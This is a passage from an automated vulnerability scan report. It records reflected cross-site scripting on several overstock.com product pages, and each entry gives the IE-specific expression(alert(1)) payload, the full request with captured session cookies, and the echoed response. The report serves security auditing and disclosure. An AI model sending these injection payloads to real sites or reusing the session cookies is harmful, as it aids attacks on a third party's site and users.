Set-Cookie: cinfo=ccnt^0:ctmst^1289406605513:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=5105715|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:30:05 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:30:05 GMT; Path=/
Keep-Alive: timeout=5, max=1
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 106234

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j18.overstock.com ssl:false -->


<head>

<title>'A
...[SNIP]...
<input type="hidden" name="73179"style="x:expression(alert(1))"859c5084c71" value="1"/>
...[SNIP]...

2.131. http://www.overstock.com/Home-Garden/A-frame-Espresso-Desk/4042651/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/A-frame-Espresso-Desk/4042651/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3bbb9"style%3d"x%3aexpression(alert(1))"cc60dc457f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3bbb9"style="x:expression(alert(1))"cc60dc457f9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/A-frame-Espresso-Desk/4042651/product.html?3bbb9"style%3d"x%3aexpression(alert(1))"cc60dc457f9=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:27:02 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:27:02 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:27:02 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=4042651|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:27:02 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289406422412:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=76
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 109364

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j19.overstock.com ssl:false -->


<head>

<title>A-
...[SNIP]...
<input type="hidden" name="3bbb9"style="x:expression(alert(1))"cc60dc457f9" value="1"/>
...[SNIP]...

2.132. http://www.overstock.com/Home-Garden/ATH-Home-Bath-Space-Savers/4429367/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/ATH-Home-Bath-Space-Savers/4429367/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5723"style%3d"x%3aexpression(alert(1))"dc27975fdfa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a5723"style="x:expression(alert(1))"dc27975fdfa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/ATH-Home-Bath-Space-Savers/4429367/product.html?a5723"style%3d"x%3aexpression(alert(1))"dc27975fdfa=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:24:42 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:24:42 GMT
Pragma: no-cache
Set-Cookie: cinfo=ccnt^0:ctmst^1289406282184:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:24:42 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=4429367|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:24:42 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 110461

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j20.overstock.com ssl:false -->


<head>

<title>AT
...[SNIP]...
<input type="hidden" name="a5723"style="x:expression(alert(1))"dc27975fdfa" value="1"/>
...[SNIP]...

2.133. http://www.overstock.com/Home-Garden/Abstract-Hand-painted-Oil-on-Canvas-Art-Set/4324396/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Abstract-Hand-painted-Oil-on-Canvas-Art-Set/4324396/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ecce7"style%3d"x%3aexpression(alert(1))"5e9cdf261eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ecce7"style="x:expression(alert(1))"5e9cdf261eb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/Abstract-Hand-painted-Oil-on-Canvas-Art-Set/4324396/product.html?ecce7"style%3d"x%3aexpression(alert(1))"5e9cdf261eb=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:30:11 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:30:11 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=4324396|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:30:11 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289406611040:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:30:11 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=40
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 106011

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j15.overstock.com ssl:false -->


<head>

<title>Ab
...[SNIP]...
<input type="hidden" name="ecce7"style="x:expression(alert(1))"5e9cdf261eb" value="1"/>
...[SNIP]...

2.134. http://www.overstock.com/Home-Garden/Abstract-Wall-Art/2036145/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Abstract-Wall-Art/2036145/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8923f"style%3d"x%3aexpression(alert(1))"85ef6a8bd2d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8923f"style="x:expression(alert(1))"85ef6a8bd2d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/Abstract-Wall-Art/2036145/product.html?8923f"style%3d"x%3aexpression(alert(1))"85ef6a8bd2d=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:31:03 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:31:03 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=2036145|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:31:03 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289406663103:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:31:03 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=22
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 111661

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j15.overstock.com ssl:false -->


<head>

<title>Ab
...[SNIP]...
<input type="hidden" name="8923f"style="x:expression(alert(1))"85ef6a8bd2d" value="1"/>
...[SNIP]...

2.135. http://www.overstock.com/Home-Garden/Algreen-Cascata-65-gallon-Rain-Water-Collection-System/4408338/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Algreen-Cascata-65-gallon-Rain-Water-Collection-System/4408338/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c15b"style%3d"x%3aexpression(alert(1))"e9ad1dd2c4b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5c15b"style="x:expression(alert(1))"e9ad1dd2c4b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/Algreen-Cascata-65-gallon-Rain-Water-Collection-System/4408338/product.html?5c15b"style%3d"x%3aexpression(alert(1))"e9ad1dd2c4b=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:37:02 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:37:02 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:37:02 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=4408338|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:37:02 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289407022562:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=66
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 108026

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j19.overstock.com ssl:false -->


<head>

<title>Al
...[SNIP]...
<input type="hidden" name="5c15b"style="x:expression(alert(1))"e9ad1dd2c4b" value="1"/>
...[SNIP]...

2.136. http://www.overstock.com/Home-Garden/All-Directional-Chrome-Showerhead/4688005/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/All-Directional-Chrome-Showerhead/4688005/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8af6c"style%3d"x%3aexpression(alert(1))"c395720b29e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8af6c"style="x:expression(alert(1))"c395720b29e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/All-Directional-Chrome-Showerhead/4688005/product.html?8af6c"style%3d"x%3aexpression(alert(1))"c395720b29e=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:37:19 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:37:19 GMT
Pragma: no-cache
Set-Cookie: cinfo=ccnt^0:ctmst^1289407039184:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:37:19 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=4688005|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:37:19 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=85
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 109910

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j20.overstock.com ssl:false -->


<head>

<title>Al
...[SNIP]...
<input type="hidden" name="8af6c"style="x:expression(alert(1))"c395720b29e" value="1"/>
...[SNIP]...

2.137. http://www.overstock.com/Home-Garden/All-Seasons-Down-Alternative-Microfiber-Blanket/4081645/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/All-Seasons-Down-Alternative-Microfiber-Blanket/4081645/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4400"style%3d"x%3aexpression(alert(1))"9ea5e34285 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e4400"style="x:expression(alert(1))"9ea5e34285 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/All-Seasons-Down-Alternative-Microfiber-Blanket/4081645/product.html?e4400"style%3d"x%3aexpression(alert(1))"9ea5e34285=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:51:22 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:51:22 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=4081645|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:51:22 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289407882836:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:51:22 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=18
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 113635

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j15.overstock.com ssl:false -->


<head>

<title>Al
...[SNIP]...
<input type="hidden" name="e4400"style="x:expression(alert(1))"9ea5e34285" value="1"/>
...[SNIP]...

2.138. http://www.overstock.com/Home-Garden/All-season-Luxurious-Down-Alternative-Comforter/3297897/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/All-season-Luxurious-Down-Alternative-Comforter/3297897/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93008"style%3d"x%3aexpression(alert(1))"f9f5845dae2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 93008"style="x:expression(alert(1))"f9f5845dae2 in the application's response.

